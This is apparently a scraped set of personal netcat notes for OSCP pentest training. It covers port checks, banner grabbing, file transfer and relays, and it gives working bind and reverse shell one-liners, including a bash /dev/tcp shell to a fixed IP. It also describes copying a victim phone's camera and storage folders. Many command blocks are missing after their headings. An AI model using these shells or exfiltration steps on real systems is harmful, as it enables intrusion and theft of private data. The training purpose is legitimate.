Netcat
Connecting to TCP/UDP Port
We can use client mode to connect to any TCP/UDP port, allowing us to:
Check if a port is open or closed.
• Read a banner from the service listening on a port.
• Connect to a network service manually.
Netcat
Netcat first released in 1995(!) by Hobbit is one of the “original” network penetration testing tools and is so versatile that it lives up to the author’s designation as a hacker’s “Swiss army knife”. The clearest definition of Netcat is from Hobbit himself: a simple “utility which reads and writes data across network connections, using TCP or UDP protocols
OK!
in the Victim Write this
In the Attacker
Chatting using nc
nc -nvlp 4444 // on the server
• -n stands for "numeric-only", which prevents nc from attempting to resolve hostnames to IP addresses.
• -v stands for "verbose", which causes nc to print more detailed output.
• -l stands for "listen", which causes nc to listen on the specified port for incoming connections.
• -p stands for "port", which specifies the port number to listen on.
nc -nv 10.0.2.10 4444 on the client to make a connection with the server
-t (TCP) -> To use TCP instead of the default.
-u (UDP) -> To Use UDP Protocol
There are some other protocols, such as RAW and others, and I will leave it to you to search for that
--
Bind shell
nc -nvlp 4444 -e /bin/bash ⇒ on the victim machine
nc -nv 10.0.2.10 4444 ⇒ on attacker machine to connect with the victim machine
—
Reverse Shell
nc -nvlp 4444 ⇒ on attacker machine
nc -nv 10.0.2.9 4444 -e /bin/bash ⇒ on victim machine
netcat is a powerful tool often used in the OSCP (Offensive Security Certified Professional) exam for various purposes, such as setting up reverse shells, file transfers, port scanning, and even setting up a simple web server. Here are some common netcat use cases that are particularly relevant for the OSCP:
1. Reverse Shells
A reverse shell is a shell session initiated by the target machine to the attacker's machine. This is often used to bypass firewalls and NAT.
On the Attacker's Machine (Listening):
On the Target Machine (Connecting Back):
For Windows targets:
2. Bind Shells
A bind shell is a shell session where the target machine opens a listening port and waits for an attacker to connect to it.
On the Target Machine (Listening):
For Windows targets:
On the Attacker's Machine (Connecting):
3. File Transfer
netcat can be used to transfer files between the attacker and the target machine.
On the Receiving Machine:
On the Sending Machine:
and use Watch to watch transferring
There are many ways, but I will Just One Way Using Netcat
1. Netcat
You Will Compress The File And Then Transfer The Compressed File Which Holds A Lot Of Data
I've turned on Netcat From My Termux In My Phone I brought the shell using the methods we learned above , Now let's see the contents of this Camera folder
In Attacker Machine After Bring control Using Termux Open New Session Using Netcat
And In Same Attacker Machine , Open New Tap And Get File Zip
Then unzip it and all the data has been simply brought into one compressed file
You can use the same idea in an external path to retrieve the largest number of information, files and folders from the victim’s device
-- Such a folder is located inside a main folder named Storage What if I discussed the same idea?
You will have all this information at your fingertips:
Inside these folders there is a lot of sensitive information and files
4. Port Scanning
netcat can be used to scan for open ports on a target machine.
5. Banner Grabbing
To gather information about services running on open ports.
You can then type something like HEAD / HTTP/1.1 and press Enter twice to get the HTTP headers.
6. Setting Up a Simple Web Server
You can use netcat to serve a single HTTP response.
Simple HTTP Server:
Create a simple HTML file (index.html):
Serve the file with netcat:
7. Port Forwarding
You can forward traffic from one port to another using netcat.
Practical Examples in OSCP
Example 1: Reverse Shell via a Vulnerable Web Application
Assume you have identified a vulnerable web application that allows you to execute commands. You could use the following command to get a reverse shell:
Example 2: Privilege Escalation via File Transfer
You have gained limited access to a target machine and found a privilege escalation exploit that you need to upload. On your machine:
On the target machine:
Example 3: Scanning for Open Ports During Reconnaissance
Use netcat to quickly check for open ports on a target machine:
Example 4: Bind Shell for Post-Exploitation
You have exploited a service and want to maintain access:
On the target machine:
On your machine:
By mastering these netcat commands and understanding how to use them in various scenarios, you can greatly enhance your efficiency and effectiveness during the OSCP exam. Always remember to follow the ethical guidelines and legal boundaries when using these techniques.
Reverse shell without Netcat on the target host
One major downside on the shown example is that you need Netcat on that target host which is very often not the case in real world scenario’s. In some cases Netcat is present, or we have a way to install it, but in many cases we need to use alternatives ways to connect back to the attack box. Let’s have a look at a few alternative ways to setup a reverse shell.
Bash reverse shell
With can also use Bash to initiate a reverse shell from the target host to the attack box by using the following command:
bash -i >& /dev/tcp/192.168.100.113/4444 0>&1
Advenced Usage (Relay)
We will explain it with a simple example:
We have three devices A , B , C Device A He can't see it Device C But , Device B Can See Device C , And Device A
So .. In Case Device C Send CMD To Device B In Port 8080 , And Device B Can See Device A , U Can Send Malware To Connect Or Forward Connection From Device B To Device A
A -> 192.168.1.2 (Attacker)
B -> 192.168.2.5 (Server)
C -> 192.168.2.3 (Victim)
Last updated